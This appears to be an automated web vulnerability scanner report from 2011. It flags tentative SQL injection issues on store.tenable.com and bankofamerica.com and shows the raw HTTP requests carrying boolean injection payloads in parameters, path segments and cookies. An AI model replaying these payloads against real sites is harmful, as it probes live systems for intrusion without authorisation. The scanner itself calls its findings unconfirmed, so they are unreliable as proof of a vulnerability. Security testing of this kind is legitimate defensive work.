GET /includes76127428'%20or%201%3d1--%20/templates/tenable/jscript/t.js?v=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes76127428' or 1=1-- /templates/tenable/jscript/t.js on this server.</p> </body></html>
Request 2
GET /includes76127428'%20or%201%3d2--%20/templates/tenable/jscript/t.js?v=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:48:43 GMT Server: Apache Content-Length: 256 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /includes76127428' or 1=2-- /templates/tenable/jscript/t.js was not found on this server.</p> </body></html>
1.14. https://store.tenable.com/includes/templates/tenable/jscript/t.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://store.tenable.com
Path:
/includes/templates/tenable/jscript/t.js
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11526221%20or%201%3d1--%20 and 11526221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /includes/templates/tenable/jscript/t.js?v=1&111526221%20or%201%3d1--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes/templates/tenable/jscript/t.js on this server.</p> </body></html>
Request 2
GET /includes/templates/tenable/jscript/t.js?v=1&111526221%20or%201%3d2--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:48:37 GMT Server: Apache Last-Modified: Mon, 06 Dec 2010 18:50:02 GMT ETag: "12ee26-293d-5b094a80" Accept-Ranges: bytes Content-Length: 10557 Connection: close Content-Type: application/x-javascript
// #navMain interaction; jQuery(function($){ function show(){ $('#navMain li.hover').removeClass('hover'); $(this).addClass('hover'); } function hide(){ $(this).removeClass('hover'); }
$('#navMain>ul>li').hoverIntent({ sensitivity: 7, /* number = sensitivity threshold (must be 1 or higher) */ interval: 0, /* number = milliseconds for onMouseOver polling interval */ over: show, /* function = onMouseOver callback (REQUIRED) */ timeout: 500, /* number = milliseconds delay before onMouseOut */ out: hide /* function = onMouseOut callback (REQUIRED) */ }); });
// #navSearch interaction; jQuery(function($){ $('#navSearch label').each(function(i){ // loop through each LABEL to hide; var obj = '#' + $(this).attr('for'); // find the TARGET form field; var val = $(this).html(); // record the ...[SNIP]...
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 16089195%20or%201%3d1--%20 and 16089195%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /includes/templates/tenable/jscript/t.js?v=116089195%20or%201%3d1--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /includes/templates/tenable/jscript/t.js on this server.</p> </body></html>
Request 2
GET /includes/templates/tenable/jscript/t.js?v=116089195%20or%201%3d2--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
Response 2
HTTP/1.1 200 OK Date: Mon, 25 Apr 2011 23:48:22 GMT Server: Apache Last-Modified: Mon, 06 Dec 2010 18:50:02 GMT ETag: "12ee26-293d-5b094a80" Accept-Ranges: bytes Content-Length: 10557 Connection: close Content-Type: application/x-javascript
// #navMain interaction; jQuery(function($){ function show(){ $('#navMain li.hover').removeClass('hover'); $(this).addClass('hover'); } function hide(){ $(this).removeClass('hover'); }
$('#navMain>ul>li').hoverIntent({ sensitivity: 7, /* number = sensitivity threshold (must be 1 or higher) */ interval: 0, /* number = milliseconds for onMouseOver polling interval */ over: show, /* function = onMouseOver callback (REQUIRED) */ timeout: 500, /* number = milliseconds delay before onMouseOut */ out: hide /* function = onMouseOut callback (REQUIRED) */ }); });
// #navSearch interaction; jQuery(function($){ $('#navSearch label').each(function(i){ // loop through each LABEL to hide; var obj = '#' + $(this).attr('for'); // find the TARGET form field; var val = $(this).html(); // record the ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 32125367'%20or%201%3d1--%20 and 32125367'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.php32125367'%20or%201%3d1--%20?main_page=product_info&cPath=5&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php32125367' or 1=1-- on this server.</p> </body></html>
Request 2
GET /index.php32125367'%20or%201%3d2--%20?main_page=product_info&cPath=5&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:53:21 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /index.php32125367' or 1=2-- was not found on this server.</p> </body></html>
The action parameter appears to be vulnerable to SQL injection attacks. The payloads 11258655'%20or%201%3d1--%20 and 11258655'%20or%201%3d2--%20 were each submitted in the action parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php on this server.</p> </body></html>
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" /> <meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " /> <meta http-equiv="imagetoolbar" content="no" /> <meta name="author" content="Tenable Network Security" />
The cPath parameter appears to be vulnerable to SQL injection attacks. The payloads 10615830%20or%201%3d1--%20 and 10615830%20or%201%3d2--%20 were each submitted in the cPath parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.php?main_page=product_info&cPath=510615830%20or%201%3d1--%20&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php on this server.</p> </body></html>
Request 2
GET /index.php?main_page=product_info&cPath=510615830%20or%201%3d2--%20&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" /> <meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " /> <meta http-equiv="imagetoolbar" content="no" /> <meta name="author" content="Tenable Network Security" /> <meta name="robots" content="noindex, nofollow" />
The cart_quantity parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cart_quantity parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The main_page parameter appears to be vulnerable to SQL injection attacks. The payloads 11912762'%20or%201%3d1--%20 and 11912762'%20or%201%3d2--%20 were each submitted in the main_page parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.php?main_page=product_info11912762'%20or%201%3d1--%20&cPath=5&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php on this server.</p> </body></html>
Request 2
GET /index.php?main_page=product_info11912762'%20or%201%3d2--%20&cPath=5&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:47:04 GMT Server: Apache Set-Cookie: zenid=3a66f5532203e85d8d78f3164792aeb4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 21052
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>Page Not Found : Tenable Store, Unified Security Monitoring</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping Page Not Found" /> <meta name="description" content="Tenable Store : Page Not Found - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" /> <meta http-equiv="imagetoolbar" content="no" /> <meta name="author" content="Tenable Network Security" />
(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga ...[SNIP]...
1.21. https://store.tenable.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://store.tenable.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 72255422%20or%201%3d1--%20 and 72255422%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.php?main_page=product_info&cPath=5&products_id=9&172255422%20or%201%3d1--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php on this server.</p> </body></html>
Request 2
GET /index.php?main_page=product_info&cPath=5&products_id=9&172255422%20or%201%3d2--%20=1 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" /> <meta name="description" content="Tenable Store 1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - Tenable Nessus Perimeter Service is a remote vulnerability scanning service that you can use to audit your Internet facing IP addresses for both network and web application vulnerabilities. The Nessus Perimeter Service portal provides secure access to detailed vulnerability audits and remediation information on our infrastructure. You can access the " /> <meta http-equiv="imagetoolbar" content="no" /> <meta name="author" content="Tenable Network Security" />
The products_id parameter appears to be vulnerable to SQL injection attacks. The payloads 89838642%20or%201%3d1--%20 and 89838642%20or%201%3d2--%20 were each submitted in the products_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.php?main_page=product_info&cPath=5&products_id=989838642%20or%201%3d1--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php on this server.</p> </body></html>
Request 2
GET /index.php?main_page=product_info&cPath=5&products_id=989838642%20or%201%3d2--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
Response 2
HTTP/1.1 404 Not Found Date: Mon, 25 Apr 2011 23:47:52 GMT Server: Apache Set-Cookie: zenid=ceaa8dbe67c94b10d2c15c4816585a26; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 22852
<!doctype html> <html lang="en" dir="ltr" lang="en"> <head> <title>Tenable Store, Unified Security Monitoring</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping " /> <meta name="description" content="Tenable Store - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" /> <meta http-equiv="imagetoolbar" content="no" /> <meta name="author" content="Tenable Network Security" />
The zenid parameter appears to be vulnerable to SQL injection attacks. The payloads 50326897'%20or%201%3d1--%20 and 50326897'%20or%201%3d2--%20 were each submitted in the zenid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c750326897'%20or%201%3d1--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /index.php on this server.</p> </body></html>
Request 2
GET /index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c750326897'%20or%201%3d2--%20 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7
The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The BOA_0020 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the BOA_0020 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The BOA_COM_BT_ELIGIBLE cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the BOA_COM_BT_ELIGIBLE cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The CONTEXT cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the CONTEXT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The INTL_LANG cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the INTL_LANG cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The TLTSID cookie appears to be vulnerable to SQL injection attacks. The payloads 13270887'%20or%201%3d1--%20 and 13270887'%20or%201%3d2--%20 were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
1.30. https://www.bankofamerica.com/Control.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://www.bankofamerica.com
Path:
/Control.do
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 24460292'%20or%201%3d1--%20 and 24460292'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
